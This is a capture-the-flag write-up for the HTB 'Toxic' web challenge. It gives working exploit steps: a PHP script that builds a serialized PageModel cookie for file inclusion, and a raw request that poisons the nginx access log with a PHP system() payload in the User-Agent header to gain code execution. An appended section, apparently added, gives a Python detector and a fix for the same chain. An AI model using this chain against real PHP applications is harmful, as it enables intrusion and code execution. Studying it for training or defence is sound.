Toxic - HTB - Challenges

Challenge address: 139.59.189.189:32670



Checking out the source code attached to the challenge, it's easy to spot the call to unserialize. Following this blog post, https://snoopysecurity.github.io/web-application-security/2021/01/08/02_php_object_injection_exploitation-notes.html, we note that the only model defined in the challenge also implements the __destruct magic method, which will help us in our exploitation.

That method includes the file named in the object's file property, so it lets us read arbitrary files: we have an LFI on our hands.

First we must construct an appropriate PHPSESSID to exploit the unsafe unserialization. The code I used for this:

<?php
// Minimal copy of the challenge's model: only the property name matters,
// since the application's __destruct includes whatever path is stored here.
class PageModel{
        public $file;
}
$obj = new PageModel();
$obj->file = "$argv[1]";   // path to include, taken from the command line
echo serialize($obj);      // serialized object, to be base64-encoded as the cookie
?>

which we can run to read, for example, /etc/passwd as follows:
php -f test.php /etc/passwd | base64

We replace the PHPSESSID cookie with the new value in a request to index.php, and the LFI is complete.


Now we need to achieve RCE, as the flag name is randomized and we cannot find it through our basic LFI.

We can use log poisoning: send a request whose User-Agent header contains PHP code, then read /var/log/nginx/access.log through the LFI so the logged line is included and executed.

Here is my request to poison the log file so that it displays the flag on the next request (you can just as well submit this same request twice: once to poison the log, once to exploit the LFI and read the flag).

GET /index.php HTTP/1.1
Host: 139.59.189.189:32670
User-Agent: <?php echo system('cat ../flag...S'); ?> 
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://139.59.189.189:32670/
Cookie: PHPSESSID=Tzo5OiJQYWdlTW9kZWwiOjE6e3M6NDoiZmlsZSI7czoyNToiL3Zhci9sb2cvbmdpbngvYWNjZXNzLmxvZyI7fQ
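As an added defender's example (not part of the original writeup), a small Python checker for the two request-level artefacts this chain leaves behind: a PHPSESSID that base64-decodes to a serialized PHP object instead of an opaque session id, and a PHP open tag in a header that nginx writes to access.log. The sample requests, the hex session id and the "poisoned" marker are constructed; the third cookie is built from the same PageModel payload shape the writeup uses.

```python
import base64
import re

# Indicators of the chain described above: a PHP open tag smuggled into a header
# that ends up in access.log, and a PHPSESSID that is really a base64-encoded
# serialized PHP object (a normal session id is an opaque random token).
PHP_TAG_RE = re.compile(r"<\?(?:php\b|=)", re.IGNORECASE)
PHP_OBJECT_RE = re.compile(rb'^O:\d+:"[A-Za-z_\\][\w\\]*":\d+:\{')
SESSION_RE = re.compile(r"PHPSESSID=([A-Za-z0-9+/=]+)")


def decode_cookie(value):
    """Base64-decode a cookie value, tolerating stripped '=' padding; None if not base64."""
    padded = value + "=" * (-len(value) % 4)
    try:
        return base64.b64decode(padded, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None


def find_indicators(headers):
    """Return (indicator, header-name) pairs found in one request's headers."""
    findings = []
    for name, value in headers.items():
        if PHP_TAG_RE.search(value):
            findings.append(("php-tag-in-header", name))
    match = SESSION_RE.search(headers.get("Cookie", ""))
    if match:
        raw = decode_cookie(match.group(1))
        if raw is not None and PHP_OBJECT_RE.match(raw):
            findings.append(("serialized-object-session", "Cookie"))
    return findings


# Constructed sample requests (not captured from the challenge host).
GADGET = b'O:9:"PageModel":1:{s:4:"file";s:25:"/var/log/nginx/access.log";}'
SAMPLE_REQUESTS = [
    {"User-Agent": "Mozilla/5.0", "Cookie": "PHPSESSID=3f9a1c0e7b2d4a5e6f7081920a1b2c3d"},
    {"User-Agent": "<?php echo 'poisoned'; ?>", "Cookie": "PHPSESSID=3f9a1c0e7b2d4a5e6f7081920a1b2c3d"},
    {"User-Agent": "curl/8.0", "Cookie": "PHPSESSID=" + base64.b64encode(GADGET).decode().rstrip("=")},
]

if __name__ == "__main__":
    for i, req in enumerate(SAMPLE_REQUESTS):
        print(i, find_indicators(req) or "clean")
```

On the application side the root cause is closed by not passing cookie data to unserialize() at all, or at least calling it with ['allowed_classes' => false] so no object (and therefore no __destruct) is ever instantiated from client input.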



Merry hacking ;)

